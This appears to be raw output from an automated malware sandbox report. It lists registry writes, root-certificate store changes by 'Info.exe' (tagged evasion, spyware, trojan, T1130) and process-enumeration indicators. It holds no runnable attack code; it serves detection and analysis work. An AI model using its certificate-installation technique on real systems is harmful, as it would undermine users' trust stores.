Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active	MicrosoftEdge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{20EP1MI0-142C-L17D-YD26-2GCP283P3KMT}	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DontShowMeThisDialogAgain	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{45AC2TN3-666M-M32E-TO40-1MIP137D5TOZ}\1 = "5048"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersi = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{62FM2EJ3-714D-A09D-WM25-6QFJ226I1FER}\1 = "30"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\""	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\OneTimeCleanup = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{45AC2TN3-666M-M32E-TO40-1MIP137D5TOZ}	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CacheLimit = "1"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{2984096E-0EA7-4987-82C4-6A77CD85E607}"	MicrosoftEdge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{69RG4ZP0-857P-S13A-ZW93-6DTG316B7ZWC}	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{4F95E550-8299-4FB3-A305-764ABCB8F3FA} = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-08760 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{69RG4ZP0-857P-S13A-ZW93-6DTG316B7ZWC}\650478DC7424C37C\2 = "1"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	Info.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	Info.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	Info.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd67707390b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b660537f000000010000000e000000300c060a2b0601040182370a03047e000000010000000800000000c001b39667d601030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	Info.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 5c0000000100000004000000000800001900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c137e000000010000000800000000c001b39667d6017f000000010000000e000000300c060a2b0601040182370a03041d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589100b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000006200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd6770739090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703080f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d040000000100000010000000410352dc0ff7501b16f0028eba6f45c520000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	Info.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	Info.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4492	rundll32.exe
4492	rundll32.exe
1152	svchost.exe
1152	svchost.exe
1308	4192468.exe
1308	4192468.exe
4308	Info.exe
4308	Info.exe
4940	Installation.exe
4940	Installation.exe
4940	Installation.exe
4940	Installation.exe
4940	Installation.exe
4940	Installation.exe
4940	Installation.exe
4940	Installation.exe
1152	svchost.exe
1152	svchost.exe
4504	x2BFjy8SRtdIV0VKlMSL7WDQ.exe
4504	x2BFjy8SRtdIV0VKlMSL7WDQ.exe
3024	Process not Found
3024	Process not Found
3024	Process not Found
3024	Process not Found
3024	Process not Found
3024	Process not Found
4672	WerFault.exe
4672	WerFault.exe
4672	WerFault.exe
4672	WerFault.exe
4672	WerFault.exe
4672	WerFault.exe
4672	WerFault.exe
4672	WerFault.exe
4672	WerFault.exe
4672	WerFault.exe
4672	WerFault.exe
4672	WerFault.exe
4672	WerFault.exe
4672	WerFault.exe
4672	WerFault.exe
